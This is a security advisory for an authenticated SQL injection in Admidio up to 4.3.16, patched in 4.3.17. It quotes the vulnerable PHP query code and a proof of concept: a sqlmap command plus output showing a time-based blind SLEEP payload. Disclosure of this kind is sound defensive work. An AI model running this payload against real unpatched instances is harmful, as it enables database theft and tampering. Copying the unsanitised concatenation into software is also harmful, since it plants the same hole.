Skip to content

Authenticated SQL Injection in Member Assignment Functionality

High
Fasse published GHSA-2v5m-cq9w-fc33 Oct 22, 2025

Package

admidio

Affected versions

<= 4.3.16

Patched versions

4.3.17

Description

Summary

An authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.

Details

The vulnerability is located in the adm_program/modules/groups-roles/members_assignment_data.php script. This script handles an AJAX request to fetch a list of users for role assignment. The filter_rol_uuid GET parameter is not properly sanitized before being used in a raw SQL query.

File: adm_program/modules/groups-roles/members_assignment_data.php

// ... 
// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.
$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');
$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));

// ... 
$filterRoleCondition = '';
if ($getMembersShowAll) {
    $getFilterRoleUuid = 0;
} else {
    // show only members of current organization
    if ($getFilterRoleUuid !== '') {
        // VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.
        $filterRoleCondition = ' AND rol_uuid = \''.$getFilterRoleUuid . '\'';
    }
}

// ...
// The vulnerable $filterRoleCondition is then used inside a subselect.
$sqlSubSelect = '(SELECT COUNT(*) AS count_this
                    FROM '.TBL_MEMBERS.'
              INNER JOIN '.TBL_ROLES.'
                      ON rol_id = mem_rol_id
              INNER JOIN '.TBL_CATEGORIES.'
                      ON cat_id = rol_cat_id
                   WHERE mem_usr_id  = usr_id
                     AND mem_begin  <= \''.DATE_NOW.'\'
                     AND mem_end     > \''.DATE_NOW.'\'
                         '.$filterRoleCondition.'
                     AND rol_valid = true
                     AND cat_name_intern <> \'EVENTS\'
                     AND cat_org_id = '.$gCurrentOrgId.')';
// ...

As shown above, the value of $getFilterRoleUuid is directly concatenated into the $filterRoleCondition variable, which is then embedded within a larger SQL query ($sqlSubSelect). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.

PoC (Proof of Concept)

Prerequisites:

  1. A running instance of Admidio (tested on version 4.3.16).
  2. An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).

Execution:
The vulnerability can be triggered by manipulating the filter_rol_uuid parameter in the request to /adm_program/modules/groups-roles/members_assignment_data.php. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with sqlmap.

  1. Log in to Admidio as an administrator.
  2. Navigate to Groups / Roles.
  3. Click the "Assign members" icon for any existing role.
  4. Using a web proxy like Burp Suite, intercept the GET request made to /adm_program/modules/groups-roles/members_assignment_data.php.
  5. Save the entire raw request to a text file (e.g., admidio_request.txt).
  6. Run the following sqlmap command to confirm the time-based blind SQL injection:
sqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db

Result:
sqlmap will successfully identify and exploit the time-based blind SQL injection vulnerability.

---
Parameter: filter_rol_uuid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
[INFO] retrieved: admidio
current database: 'admidio'

This confirms that an attacker can execute arbitrary SQL queries and extract information from the database.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2025-62617

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Learn more on MITRE.

Credits